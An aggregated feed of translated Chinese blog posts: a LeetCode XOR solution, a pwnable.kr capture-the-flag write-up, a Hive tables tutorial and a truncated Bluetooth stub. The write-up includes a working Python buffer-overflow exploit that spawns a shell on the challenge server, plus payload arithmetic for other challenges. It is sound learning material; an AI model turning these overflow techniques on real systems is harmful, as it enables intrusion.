【leetcode77】Single Number

July 31, 2016, 12:15 am

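Problem:

Given an array in which every number appears twice except for one, find the number that appears only once.

Approach:

XOR all the elements together. Equal numbers cancel out (a ^ a = 0), so the value left at the end is the single number.

Code: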

public class Solution {
    public int singleNumber(int[] nums) {
        int left = nums[0];
        for (int i = 1; i < nums.length; i++) {
            left = left ^ nums[i];
        }
        return left;
    }
}
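
As a quick check of the cancellation argument, here is a minimal Python sketch of the same XOR fold. The function name `single_number` and the sample input are illustrative and not part of the original post.

```python
from functools import reduce
from operator import xor


def single_number(nums):
    # XOR is commutative and associative, and a ^ a == 0,
    # so every paired value cancels and only the unpaired one remains.
    return reduce(xor, nums)


print(single_number([4, 1, 2, 1, 2]))
```

The order of the elements does not matter, which is why no sorting or extra storage is needed.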

Author: u010321471, posted 2016/7/31 0:15:39


↧

Learning pwn from scratch with pwnable.kr

July 31, 2016, 12:17 am

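Article link: http://blog.csdn.net/u012763794/article/details/51992512

The site below is recommended by many CTF learning resources.

Challenge site: http://pwnable.kr/play.php

Write-ups for more of the challenges can be found here; mine will be updated as my study progresses.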

http://rickgray.me/2015/07/24/toddler-s-bottle-writeup-pwnable-kr.html

fd

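Needless to say, start by connecting with the credentials the challenge gives you.

Take a look at the code.

Key function: read

ssize_t read(int fd,void * buf ,size_t count);
Description
read() transfers up to count bytes from the file referred to by fd into the memory that buf points to. If count is 0, read() has no effect and returns 0. The return value is the number of bytes actually read; 0 means that end of file was reached or that no data is available. The file offset advances by the number of bytes read.

The other piece of background is Linux file descriptors:

Integer value	Name	<unistd.h> symbolic constant	<stdio.h> file stream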
0	Standard input	STDIN_FILENO	stdin
1	Standard output	STDOUT_FILENO	stdout
2	Standard error	STDERR_FILENO	stderr

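So if we make fd refer to standard input, the contents of buf can be typed in from the keyboard.

The goal is to make fd equal 0, so the first argument we pass must be 0x1234, which is 4660 in decimal.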
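
The post does not reproduce the challenge source, so the following is only a sketch under the assumption that the program computes fd as `atoi(argv[1]) - 0x1234`, which is what the argument value above implies. The helper name `argument_for_fd` is made up for illustration.

```python
OFFSET = 0x1234   # constant assumed to be subtracted by the challenge binary
STDIN_FILENO = 0  # standard input, as in the table above


def argument_for_fd(wanted_fd, offset=OFFSET):
    # Invert fd = int(argument) - offset to get the command-line argument.
    return str(wanted_fd + offset)


print(argument_for_fd(STDIN_FILENO))
```

The same inversion works for any other descriptor, for example standard output or standard error, although only standard input lets us type the buffer contents.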

That gets the flag.

collision

The source is given directly for this one too, so let's read it first.

#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
        int* ip = (int*)p;
        int i;
        int res=0;
        for(i=0; i<5; i++){
                res += ip[i];
        }
        return res;
}

int main(int argc, char* argv[]){
        if(argc<2){
                printf("usage : %s [passcode]\n", argv[0]);
                return 0;
        }
        if(strlen(argv[1]) != 20){
                printf("passcode length should be 20 bytes\n");
                return 0;
        }

        if(hashcode == check_password( argv[1] )){
                system("/bin/cat flag");
                return 0;
        }
        else
                printf("wrong passcode.\n");
        return 0;
}

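First, there must be one command-line argument, and its length must be exactly 20.

Next, check_password casts it to an int pointer. A char takes 1 byte and an int takes 4, so after the cast the 20 bytes form an array of 5 ints, which matches the for loop. In other words, the five ints read from the string must add up to the hexadecimal hashcode.

Just do the subtraction and pick any five values that sum to it.

Note that the values must be laid out in little-endian byte order.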
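
One way to do the arithmetic is sketched below. The choice of four equal words plus a remainder is just one convenient split, and the name `build_passcode` is illustrative. Because the result is passed as a command-line string and measured with strlen, it should not contain a zero byte, so the sketch prints the bytes for inspection.

```python
import struct

HASHCODE = 0x21DD09EC  # target value from the challenge source
WORDS = 5              # check_password sums five 4-byte ints


def build_passcode(target=HASHCODE, words=WORDS):
    # Use the same value for the first four ints and let the last one
    # absorb the remainder so that the total equals the target.
    base = target // words
    last = target - base * (words - 1)
    values = [base] * (words - 1) + [last]
    # "<I" packs each value as a little-endian unsigned 32-bit integer.
    return b"".join(struct.pack("<I", v) for v in values)


passcode = build_passcode()
print(passcode.hex())
```

If a different split produced a zero byte, shifting a small amount from one word to another would keep the sum unchanged while altering the bytes.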

bof

Code

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

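We only need to overwrite key with 0xcafebabe.

Opening the binary in IDA shows that overflowme starts at ebp-0x2c, i.e. 44 bytes below ebp. Adding the 8 bytes taken by the saved ebp and the return address gives 52 bytes of padding, and the 4 bytes written after that overwrite key.

The final exploit code is: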

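# -*-coding:utf8 -*-
import socket
import telnetlib
import struct

# Pack a 32-bit integer into bytes (little-endian)
def p32(val):
	# <: little-endian, L: unsigned long (4 bytes in standard size mode)
	return struct.pack("<L", val)

def pwn():
	# Create a TCP socket
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	# Connect to port 9000 on the server (connect takes a tuple)
	s.connect(("pwnable.kr",9000))
	# The value that must overwrite key
	target_addr = p32(0xcafebabe)

	# Build the payload: 52 bytes of padding, then the new value of key
	payload = b'A' * 52 + target_addr

	# Send the data to the server
	s.sendall(payload + b'\n')
	# Wrap the socket in a Telnet object to interact with the spawned shell
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()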

pwn()

flag

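The challenge says this is a reversing task: a 64-bit Linux ELF. Others mentioned that it is packed. That can be seen in IDA, and I finally spotted it in the hex dump as well.

Of course you can also just search the file with Notepad++ or a similar tool. A packed Linux binary is usually packed with UPX; Linux software is mostly open source and rarely needs packing, Android aside.

So unpack it with upx -d, open the result in IDA, and the flag shows up.

Follow the reference to the string.

Submitting it fails: what IDA shows is only a comment, and some characters may be invisible or cut off at a space.

Searching for UPX in Notepad++ confirms that the file was indeed packed.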
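
The text-editor search can also be scripted. The sketch below is a heuristic only: it assumes the packer left its usual ASCII marker "UPX!" in the file, which a modified packer could strip. The function names are illustrative.

```python
UPX_MAGIC = b"UPX!"  # marker normally embedded by the UPX packer


def looks_upx_packed(data):
    # A plain substring search, equivalent to searching in a text editor.
    return UPX_MAGIC in data


def file_looks_upx_packed(path):
    # Read the whole file as bytes; fine for small challenge binaries.
    with open(path, "rb") as f:
        return looks_upx_packed(f.read())


print(looks_upx_packed(b"\x7fELF....UPX!...."))
```

A positive result only suggests trying upx -d; it does not prove the file can be unpacked.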

passcode

The jump in difficulty here is a bit steep for me. Let's look at the source first.

#include <stdio.h>
#include <stdlib.h>

void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1);
        fflush(stdin);

        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

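Let's get familiar with the assembly first, since we are beginners anyway.

Below we can see the difference between calling scanf with and without the address-of operator &. With &, the compiler uses lea and stores the result as the argument, so the address of the stack slot is passed. Without it, the compiler uses mov, so the value held in the stack slot is passed instead.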

Dump of assembler code for function main:
   0x08048665 <+0>:     push   %ebp
   0x08048666 <+1>:     mov    %esp,%ebp
   0x08048668 <+3>:     and    $0xfffffff0,%esp
   0x0804866b <+6>:     sub    $0x10,%esp
   0x0804866e <+9>:     movl   $0x80487f0,(%esp)   ;put the address of "Toddler's Secure Login System 1.0 beta.\n" on the stack
   0x08048675 <+16>:    call   0x8048450 <puts@plt> ;call puts
   0x0804867a <+21>:    call   0x8048609 <welcome> ;call welcome
   0x0804867f <+26>:    call   0x8048564 <login> ;call login
   0x08048684 <+31>:    movl   $0x8048818,(%esp) ;put the address of "Now I can safely trust you that you have credential :)" on the stack
   0x0804868b <+38>:    call   0x8048450 <puts@plt> ;call puts
   0x08048690 <+43>:    mov    $0x0,%eax  ;return value 0
   0x08048695 <+48>:    leave ;equivalent to mov %ebp,%esp; pop %ebp, which tears down the stack frame
   0x08048696 <+49>:    ret   ;return
End of assembler dump.


Dump of assembler code for function welcome:
   0x08048609 <+0>:     push   %ebp
   0x0804860a <+1>:     mov    %esp,%ebp
   0x0804860c <+3>:     sub    $0x88,%esp
   0x08048612 <+9>:     mov    %gs:0x14,%eax
   0x08048618 <+15>:    mov    %eax,-0xc(%ebp)
   0x0804861b <+18>:    xor    %eax,%eax
   0x0804861d <+20>:    mov    $0x80487cb,%eax  ;address of "enter you name : "
   0x08048622 <+25>:    mov    %eax,(%esp)      ;put it on the stack
   0x08048625 <+28>:    call   0x8048420 <printf@plt> ;call printf
   0x0804862a <+33>:    mov    $0x80487dd,%eax  ;address of "%100s"
   0x0804862f <+38>:    lea    -0x70(%ebp),%edx ;address of the local variable name
   0x08048632 <+41>:    mov    %edx,0x4(%esp) ;put the address of name on the stack
   0x08048636 <+45>:    mov    %eax,(%esp) ;put the address of "%100s" on the stack
   0x08048639 <+48>:    call   0x80484a0 <__isoc99_scanf@plt> ;call scanf
   0x0804863e <+53>:    mov    $0x80487e3,%eax ;address of "Welcome %s!\n"
   0x08048643 <+58>:    lea    -0x70(%ebp),%edx ;start address of name
   0x08048646 <+61>:    mov    %edx,0x4(%esp)   ;put the start address of name on the stack
   0x0804864a <+65>:    mov    %eax,(%esp)      ;put the address of "Welcome %s!\n" on the stack
   0x0804864d <+68>:    call   0x8048420 <printf@plt> ;call printf
   0x08048652 <+73>:    mov    -0xc(%ebp),%eax 
   0x08048655 <+76>:    xor    %gs:0x14,%eax      ;stack canary check: pairs with the load from %gs:0x14 at <+9>; on a mismatch __stack_chk_fail is called
   0x0804865c <+83>:    je     0x8048663 <welcome+90>
   0x0804865e <+85>:    call   0x8048440 <__stack_chk_fail@plt>
   0x08048663 <+90>:    leave
   0x08048664 <+91>:    ret
End of assembler dump.

Dump of assembler code for function login:
   0x08048564 <+0>:  push   %ebp
   0x08048565 <+1>:  mov    %esp,%ebp
   0x08048567 <+3>:  sub    $0x28,%esp
   0x0804856a <+6>:  mov    $0x8048770,%eax ;address of "enter passcode1 : "
   0x0804856f <+11>: mov    %eax,(%esp) ;put it on the stack
   0x08048572 <+14>: call   0x8048420 <printf@plt> ;call printf
   0x08048577 <+19>: mov    $0x8048783,%eax ;address of "%d"
   0x0804857c <+24>: mov    -0x10(%ebp),%edx ;passcode1
   0x0804857f <+27>: mov    %edx,0x4(%esp) ;this is the bug: the value stored in the stack slot is passed, not the slot's address
   0x08048583 <+31>: mov    %eax,(%esp) ;put the address of "%d" on the stack
   0x08048586 <+34>: call   0x80484a0 <__isoc99_scanf@plt> ;call scanf
   0x0804858b <+39>: mov    0x804a02c,%eax ;load stdin
   0x08048590 <+44>: mov    %eax,(%esp)
   0x08048593 <+47>: call   0x8048430 <fflush@plt> ;fflush(stdin): meant to discard whatever is left in the input buffer
   0x08048598 <+52>: mov    $0x8048786,%eax  ;"enter passcode2 : "
   0x0804859d <+57>: mov    %eax,(%esp) ;put it on the stack
   0x080485a0 <+60>: call   0x8048420 <printf@plt> 
   0x080485a5 <+65>: mov    $0x8048783,%eax ;"%d"
   0x080485aa <+70>: mov    -0xc(%ebp),%edx ;passcode2
   0x080485ad <+73>: mov    %edx,0x4(%esp) ;same bug: the value stored in the stack slot is passed, not the slot's address
   0x080485b1 <+77>: mov    %eax,(%esp) ;put the address of "%d" on the stack
   0x080485b4 <+80>: call   0x80484a0 <__isoc99_scanf@plt>
   0x080485b9 <+85>: movl   $0x8048799,(%esp)  ;"checking..."
   0x080485c0 <+92>: call   0x8048450 <puts@plt> ;print it
   0x080485c5 <+97>: cmpl   $0x528e6,-0x10(%ebp) ;compare passcode1 with 0x528e6
   0x080485cc <+104>:   jne    0x80485f1 <login+141> ;if not equal, jump to the login-failed branch
   0x080485ce <+106>:   cmpl   $0xcc07c9,-0xc(%ebp) ;compare passcode2 with 0xcc07c9
   0x080485d5 <+113>:   jne    0x80485f1 <login+141> ;if not equal, also jump to the login-failed branch
   0x080485d7 <+115>:   movl   $0x80487a5,(%esp) ;"Login OK!"
   0x080485de <+122>:   call   0x8048450 <puts@plt>
   0x080485e3 <+127>:   movl   $0x80487af,(%esp) ;"/bin/cat flag"
   0x080485ea <+134>:   call   0x8048460 <system@plt>
   0x080485ef <+139>:   leave  ;tear down the stack frame
   0x080485f0 <+140>:   ret    
   0x080485f1 <+141>:   movl   $0x80487bd,(%esp) ;"Login Failed!"
   0x080485f8 <+148>:   call   0x8048450 <puts@plt>
   0x080485fd <+153>:   movl   $0x0,(%esp)
   0x08048604 <+160>:   call   0x8048480 <exit@plt>
End of assembler dump.

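The listing shows that name starts at ebp-0x70. After welcome returns, login's stack frame has the same base as welcome's, and passcode1 sits at ebp-0x10. The difference is 0x70-0x10=0x60, i.e. 96 bytes, so whatever we write after the first 96 bytes of name becomes the initial value of passcode1. Because scanf then treats that value as a pointer, we can write 4 bytes to any address we choose.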
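
The layout above can be sketched as follows. This is not the author's exploit: the excerpt stops before choosing what to overwrite, so `PLACEHOLDER_ADDR` is a purely hypothetical address, and using the address of the system("/bin/cat flag") sequence at login+127 as the written value is only one plausible continuation taken from the listing.

```python
import struct

NAME_OFFSET = 0x70       # name lives at ebp-0x70 in welcome
PASSCODE1_OFFSET = 0x10  # passcode1 lives at ebp-0x10 in login
NAME_LIMIT = 100         # scanf("%100s") stores at most 100 bytes


def build_name(write_addr):
    # Pad up to passcode1, then place the address scanf should write to.
    padding = NAME_OFFSET - PASSCODE1_OFFSET  # 0x60 = 96 bytes
    payload = b"A" * padding + struct.pack("<I", write_addr)
    if len(payload) > NAME_LIMIT:
        raise ValueError("payload does not fit into name")
    return payload


def build_passcode1(value):
    # scanf("%d") parses decimal text and stores the int at the
    # address currently held in passcode1.
    return str(value).encode()


PLACEHOLDER_ADDR = 0x41424344  # hypothetical target, not taken from the binary
name_input = build_name(PLACEHOLDER_ADDR)
passcode1_input = build_passcode1(0x080485E3)  # login+127 in the listing
print(len(name_input), passcode1_input)
```

The 96 bytes of padding plus a 4-byte address add up to exactly the 100 bytes that "%100s" accepts, which is why only passcode1, and not passcode2, can be preset this way. The address bytes must not contain whitespace, because "%s" stops reading at whitespace.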

Author: u012763794, posted 2016/7/31 0:17:50


↧

Understanding Hive Tables

July 31, 2016, 12:22 am

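Logically, a Hive table consists of the table's data and its associated metadata. The metadata describes the table's structure, indexes and so on. The data usually lives in HDFS, although any Hadoop file system is supported, such as Amazon S3 or the local file system. The metadata is kept in a relational database: the embedded default is Derby, and MySQL is a very common choice.

Many relational databases offer a namespace concept for separating databases or schemas, for example MySQL's database and PostgreSQL's namespace. Hive provides the same kind of logical separation, with statements including: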

CREATE DATABASE dbname;
USE dbname;
DROP DATABASE dbname;

A table's full name is dbname.tablename. If dbname is not specified, the default database is used. The show databases and show tables commands list the databases and the tables within a database.

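1. Managed tables and external tables

When you create a table in Hive, by default Hive manages the table's data, which means it moves the data into its warehouse directory. Alternatively, you can create an external table, which tells Hive to refer to data that lives outside the warehouse directory.

The difference between the two types shows up first in the behavior of LOAD and DROP. Consider the following statements:

CREATE TABLE managed_table(dummy STRING);
LOAD DATA INPATH '/user/root/data.txt' INTO table managed_table;

These statements move hdfs://user/root/data.txt into Hive's directory for the table, hdfs://user/hive/warehouse/managed_table. Loading is very fast because Hive only moves the file into place. It does not check whether the data conforms to the declared schema; that check usually happens at read time, which is known as Schema On Read.

When a managed table is removed with DROP, both its data and its metadata are deleted and no longer exist. This is what Hive Managed means.

DROP TABLE managed_table;

External tables are different: you control the creation and deletion of the data yourself, and Hive does not manage it. The location of the data is specified at CREATE time:

CREATE EXTERNAL TABLE external_table (dummy STRING)
    LOCATION '/user/root/external_table';

LOAD DATA INPATH '/user/root/data.txt' INTO TABLE external_table;

With the EXTERNAL keyword, Hive does not move the data into the warehouse directory. In fact, Hive does not even check whether the external table's directory exists, which lets us create the data after creating the table. When an external table is dropped, Hive deletes only the metadata and leaves the external data untouched.

Managed or external? In most cases the difference is small. If all processing of the data happens in Hive, managed tables are the natural choice. If Hive and other tools work on the same dataset, an external table fits better. A common pattern is to use an external table to access the initial data stored in HDFS (usually created by another tool), then transform it with Hive and put the result in a managed table. Conversely, an external table can be used to export Hive's results for other applications. Another use of external tables is to associate several schemas with one dataset.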

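2. Partitions and Buckets

Hive organizes tables into partitions, dividing a table according to the values of its partition columns. Partitions make queries over slices of the data faster. Tables or partitions can be further subdivided into buckets, which impose extra structure on the data that can be used for more efficient queries. For example, bucketing by user id makes queries by user very fast.

Partitions

Suppose every record in a log carries a timestamp. If we partition by date, all records for one day land in the same partition. Queries over one day or a few days become efficient because only the files in the matching partitions need to be scanned. Partitioning does not make queries that span wide ranges any less efficient.

A table can be partitioned along several dimensions. For example, after partitioning by date we can further partition by country.

Partitions are defined when the table is created, using the PARTITIONED BY clause, which takes a list of column definitions:

CREATE TABLE logs (ts BIGINT , line STRING)
PARTITIONED BY (dt STRING,country STRING);

When loading data into a partitioned table, the partition values are specified explicitly: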

LOAD DATA INPATH '/user/root/path'
INTO TABLE logs
PARTITION (dt='2001-01-01',country='GB');

On the file system, partitions are nested subdirectories of the table directory:

[Figure: directory structure of the partitioned logs table]
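
The mapping from partition values to directories can be sketched like this. The helper name `partition_dir` is illustrative, and the warehouse path simply follows the /user/hive/warehouse location used earlier in this article; Hive additionally escapes special characters in partition values, which this sketch ignores.

```python
def partition_dir(table_dir, partition_spec):
    # partition_spec is an ordered list of (column, value) pairs;
    # each pair becomes one directory level named column=value.
    parts = ["{}={}".format(col, val) for col, val in partition_spec]
    return "/".join([table_dir.rstrip("/")] + parts)


print(partition_dir("/user/hive/warehouse/logs",
                    [("dt", "2001-01-01"), ("country", "GB")]))
```

The order of the pairs follows the order of the columns in PARTITIONED BY, so dt forms the outer directory level and country the inner one.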

The SHOW PARTITIONS command lists a table's partitions:

hive> SHOW PARTITIONS logs;

Although the columns used for partitioning are called partition columns, their values are not stored in the data files; they are inferred from the directory names. They can still be used in SELECT statements:

SELECT ts , dt , line
FROM logs
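WHERE country='GB';

This statement scans only file1, file2 and file4, the files under the country=GB directories. The dt column it returns is read by Hive from the directory names, not from the data files.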

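Buckets

There are usually two reasons to bucket a table or partition. The first is more efficient queries. Bucketing adds extra structure to the table that Hive can exploit at query time. For example, if two tables are bucketed on the same columns, a join between them can be implemented efficiently as a map-side join, provided the join columns are among the bucketing columns. The second reason is efficient sampling. When analyzing large datasets it is often useful to inspect and analyze a sample of the data, and buckets make sampling efficient.

To have Hive bucket a table, specify the CLUSTERED BY clause when creating it: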

CREATE TABLE bucketed_users(id INT, name STRING)
CLUSTERED BY (id) INTO 4 BUCKETS;

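Here the table is bucketed on the id column into 4 buckets. Hive decides which bucket a row belongs to by hashing the column value and taking the remainder modulo the number of buckets, so each bucket is effectively a random sample of the whole dataset.

In a map-side join, both tables are bucketed on the same column, so a mapper processing a bucket of the left table can fetch the matching rows directly from the corresponding bucket of the right table. The two tables do not need the same number of buckets; it is enough for one count to be a multiple of the other. See the material on map joins for more details.

Within a bucket, the data can be sorted by one or more columns. This makes map-side joins even more efficient, because the join becomes a merge sort. The following statement declares sorted buckets:

CREATE TABLE bucketed_users(id INT,name STRING)
CLUSTERED BY (id) SORTED BY (id ASC) INTO 4 BUCKETS;

Note that Hive does not check whether the data actually satisfies the bucketing declared in the table definition; errors only show up when a query hits an inconsistency. It is therefore better to let Hive do the bucketing. Suppose we have the following unbucketed data:

hive> create table users(id INT , name STRING);

hive> insert into users values (0,'Nat'),(2,'Joe'),(3,'Kay'),(4,'Ann');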


hive> SELECT * FROM users;
0 Nat
2 Joe
3 Kay
4 Ann

To populate the bucketed table with this data, set the hive.enforce.bucketing property to true:

hive> set hive.enforce.bucketing = true;

In Hive 2.x this property does not need to be set.

Then insert the data with:

INSERT OVERWRITE TABLE bucketed_users
SELECT * FROM users;

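Physically, each bucket is a file in the table or partition directory. These files are in fact MapReduce output files, and their number equals the number of reducers. Listing the table's directory in HDFS confirms this: 4 files correspond to the 4 buckets we specified.

[Figure: HDFS listing showing the four bucket files]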

Looking at the file contents, the rows with id 0 and 4 are in bucket 0, bucket 1 has no data, and the row with id 2 is in bucket 2.

[Figure: contents of the bucket files]
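
The placement described above can be reproduced with a small sketch. It assumes that the hash of an INT column is the integer itself, which is consistent with the bucket contents reported here; the function name `bucket_for` is illustrative.

```python
NUM_BUCKETS = 4


def bucket_for(user_id, num_buckets=NUM_BUCKETS):
    # Assumption: hashing an INT yields the integer itself,
    # so the bucket index is simply id modulo the bucket count.
    return user_id % num_buckets


users = [(0, "Nat"), (2, "Joe"), (3, "Kay"), (4, "Ann")]
buckets = {b: [] for b in range(NUM_BUCKETS)}
for user_id, name in users:
    buckets[bucket_for(user_id)].append((user_id, name))

for b in sorted(buckets):
    print(b, buckets[b])
```

With only four rows the buckets are uneven; with many distinct ids the modulo spreads rows roughly evenly across the files.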

Sampling the table gives a consistent result:

select * from bucketed_users 
tablesample(bucket 1 out of 4 on id);

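Note that bucket numbers here start at 1, unlike the 0-based numbering in the file names. By choosing the bucket ratio we can sample as much of the data as we want. For example, the following statement returns half of the buckets (i.e. 2 buckets):

select * from bucketed_users
tablesample(bucket 1 out of 2 on id);

Sampling a bucketed table is efficient because only the buckets matching the tablesample clause are scanned. Sampling with a random function is different and requires a full table scan: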

select * from bucketed_users
tablesample(bucket 1 out of 4 on rand());
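
The sampling on id described above can be modelled in a few lines. This is a simplified model rather than Hive's implementation: it assumes that "bucket x out of y" keeps the rows whose hash modulo y equals x-1 and, as before, that the hash of an INT is the integer itself. The function name `tablesample` mirrors the clause for readability.

```python
def tablesample(rows, x, y, key=lambda row: row[0]):
    # bucket x OUT OF y: x is 1-based, while remainders are 0-based.
    return [row for row in rows if key(row) % y == x - 1]


users = [(0, "Nat"), (2, "Joe"), (3, "Kay"), (4, "Ann")]
print(tablesample(users, 1, 4))
print(tablesample(users, 1, 2))
```

When the sampled column is the bucketing column, the rows kept by the filter correspond to whole bucket files, so the other files need not be read. With rand() there is no such correspondence, so every row has to be evaluated.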

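3. Storage formats

A table's storage format in Hive has two aspects: the row format and the file format.
The row format describes how rows, and the fields within a row, are stored. In Hive the row format is defined by a SerDe, short for Serializer-Deserializer. When a table is queried, the SerDe acts as a deserializer, turning the bytes of a row in the file into objects. When data is inserted, it acts as a serializer, turning rows into bytes that are written to the file.

The file format describes the container format for the fields in a row. The simplest format is a plain text file, but row-oriented and column-oriented binary formats are also available.

3.1 The default storage format: delimited text

If a table is created without a ROW FORMAT or STORED AS clause, Hive uses delimited text by default, with one record per line. Within a line, fields are separated by CTRL+A. Elements of an ARRAY or STRUCT, and the key-value pairs of a MAP, are separated by CTRL+B. The key and value within a MAP entry are separated by CTRL+C. Lines are separated by newlines. In summary:

Delimited item	Delimiter
Fields within a row	CTRL+A
Items in a collection type	CTRL+B
Map key and value	CTRL+C
Rows	Newline

Note that these delimiters apply only to the usual, flat case. For nested complex types, different delimiters are used depending on the level of nesting; see the Hive documentation for details.

So by default the CREATE statement:

CREATE TABLE ...;

is equivalent to: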

CREATE TABLE ...
ROW FORMAT DELIMITED
  FIELDS TERMINATED BY '\001'
  COLLECTION ITEMS TERMINATED BY '\002'
  MAP KEYS TERMINATED BY '\003'
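  LINES TERMINATED BY '\n'
STORED AS TEXTFILE;

Internally, Hive uses a SerDe called LazySimpleSerDe for this format, working together with the text input and output formats from MapReduce.

Text files are convenient for processing by other tools such as MapReduce and Streaming. Hive also offers more compact and efficient formats.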
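
To make the default delimiters concrete, the sketch below parses one text row from outside Hive. The three-column schema (a string, an array of strings and a map of strings) and the sample values are hypothetical, and nested types are not handled.

```python
FIELD = "\x01"  # CTRL+A separates fields
ITEM = "\x02"   # CTRL+B separates collection items
KV = "\x03"     # CTRL+C separates a map key from its value


def parse_row(line):
    # Hypothetical schema: (name STRING, tags ARRAY<STRING>, props MAP<STRING,STRING>)
    name, tags, props = line.rstrip("\n").split(FIELD)
    prop_map = dict(entry.split(KV) for entry in props.split(ITEM))
    return name, tags.split(ITEM), prop_map


line = FIELD.join([
    "Nat",
    ITEM.join(["a", "b"]),
    ITEM.join(["k1" + KV + "v1", "k2" + KV + "v2"]),
]) + "\n"
print(parse_row(line))
```

Because the delimiters are control characters that rarely occur in real text, values usually need no quoting or escaping.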

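3.2 Binary formats

To use a binary format, specify the STORED AS clause when creating the table. ROW FORMAT is not needed, because the row format is determined entirely by the binary file format.

Binary formats fall into two groups: row-oriented and column-oriented. If queries touch only a few columns, a column-oriented format is a good fit. If most of each row needs to be processed, a row-oriented format is the better choice.

The row-oriented formats that Hive supports natively are Avro data files and SequenceFile. Both are general-purpose, splittable and compressible. Avro additionally supports schema resolution and bindings for multiple languages. The following statements use compressed Avro as the storage format: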

SET hive.exec.compress.output=true;
SET avro.output.codec=snappy;
CREATE TABLE ... 
STORED AS AVRO;

STORED AS SEQUENCEFILE selects sequence files as the storage format.

The column-oriented formats that Hive supports natively are Parquet, RCFile and ORCFile. The following statement uses Parquet:

CREATE TABLE users_parquet 
STORED AS PARQUET
AS
SELECT * FROM users;

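3.3 Using a custom SerDe

A custom serialization mechanism can be specified when creating a table. For example, the following statement uses a regular-expression-based SerDe to handle reading and writing the data: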

CREATE TABLE stations ( usaf STRING, wban STRING , name STRING)
ROW FORMAT SERDE 'org.apache.hadoop.hive.contrib.serde2.RegexSerDe'
WITH SERDEPROPERTIES(
  "input.regex"="(\\d{6}) (\\d{5}) (.{29}) .*"
);

ROW FORMAT SERDE specifies the SerDe to use, and SERDEPROPERTIES sets its properties.
Load the fixed-width data file into the table:

LOAD DATA INPATH "/input/ncdc/metadata/stations-fixed-width.txt"
INTO TABLE stations;

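When the table is read back, the data is deserialized by the SerDe, giving the following result:

[Figure: query result showing the usaf, wban and name columns]

The data actually stored is unchanged, but when it is parsed only the three fields we defined are produced. The data under the warehouse directory looks like this:

[Figure: the data file under the warehouse directory]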
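
What the regular expression does to one line can be tried outside Hive. The sample line below is made up for illustration and is not taken from the stations file; `fullmatch` is used on the assumption that the whole line has to match the pattern.

```python
import re

# Same pattern as input.regex, without the extra escaping needed in HiveQL.
PATTERN = re.compile(r"(\d{6}) (\d{5}) (.{29}) .*")


def parse_station(line):
    # Returns (usaf, wban, name), or None when the line does not match.
    match = PATTERN.fullmatch(line)
    if match is None:
        return None
    return match.groups()


# Hypothetical fixed-width line: 6 digits, 5 digits, a 29-character name, then the rest.
sample = "123456 99999 " + "EXAMPLE STATION".ljust(29) + " XX rest of line"
print(parse_station(sample))
```

Each capture group becomes one column, in order. Everything matched by the trailing .* is dropped, which is why only three fields come out of a wider line, and the name keeps its padding because the group is exactly 29 characters wide.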

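3.4 Storage handlers

Storage handlers are used to access storage that Hive cannot access natively, such as HBase. They are specified with the STORED BY clause instead of ROW FORMAT and STORED AS. See the Hive wiki for more on storage handlers.

4. Importing data

LOAD DATA populates a table by moving or copying files into the table's directory. We can also insert data queried from one table into another Hive table, or create a table with CREATE TABLE AS SELECT. To import data from a relational database, consider a tool such as Sqoop.

4.1 INSERT

Here is an example of an insert: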

INSERT OVERWRITE TABLE target
SELECT col1 ,col2
FROM source;

For a partitioned table, the partition can be specified on insert:

INSERT OVERWRITE TABLE target
PARTITION(dt='2010-01-01')
SELECT col1 ,col2
FROM source;

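The OVERWRITE keyword replaces the existing data in the table or partition, whereas INSERT INTO appends without overwriting. The partition can also be determined dynamically, which is called a dynamic partition insert: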

INSERT INTO TABLE target
PARTITION(dt)
SELECT col1,col2,dt
FROM source;

Records can also be inserted with VALUES:

INSERT INTO users values( 1,'name'),(2,'name');

4.2 Multi-table insert

Hive supports the following form of insert:

FROM source 
INSERT OVERWRITE TABLE target
  SELECT col1,col2;

This syntax is useful when extracting data from a single source and inserting it into several tables:

FROM records
INSERT INTO TABLE stations_by_year
  SELECT year ,COUNT(DISTINCT station)
  GROUP BY year
INSERT INTO TABLE record_by_year
  SELECT year,count(1)
  GROUP BY year
INSERT INTO TABLE good_records_by_year
  SELECT year , count(1)
  WHERE temperature != 9999 AND quality in (0,1,4,5,9)
  GROUP BY year;

4.3 Create Table … as Select

CTAS inserts the result of a query directly into a newly created table. The new table's schema is inferred from the query result.

CREATE TABLE target
AS 
SELECT col1,col2
FROM source;

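CTAS is atomic: if the SELECT fails, the table is not created.

5. Altering tables

Hive's Schema On Read makes changing a table's structure easy. Use ALTER TABLE to modify a table; the statement to rename one is: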

ALTER TABLE source RENAME TO target;

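The syntax is almost the same as MySQL's. For a managed table the underlying data directory is renamed as well; for an external table only the metadata is updated.

The following statement adds a column: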

ALTER TABLE source ADD COLUMNS (col3 STRING);

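Changing a column's name or type also follows SQL-like syntax, and works as long as the old data type can be interpreted as the new one. See the Hive manual for the full syntax.

6. Dropping tables

DROP TABLE deletes a table's data and metadata. For an external table, only the metadata in the metastore is deleted and the external data is left in place.

To delete a table's data while keeping its definition, use TRUNCATE as in MySQL: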

TRUNCATE TABLE my_table;

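This statement works only on managed tables. To delete the data of an external table, use dfs -rmr in the Hive shell, which removes the external table's directory directly.

To create an empty table with the same structure as an existing one, use the LIKE keyword, also as in MySQL: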

CREATE TABLE new_table LIKE existing_table;

Author: bingduanlbd, posted 2016/7/31 0:22:19


↧

Bluetooth, Part 3: StateMachine

July 31, 2016, 12:24 am

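State machines are used in the management of both Bluetooth and Wi-Fi.

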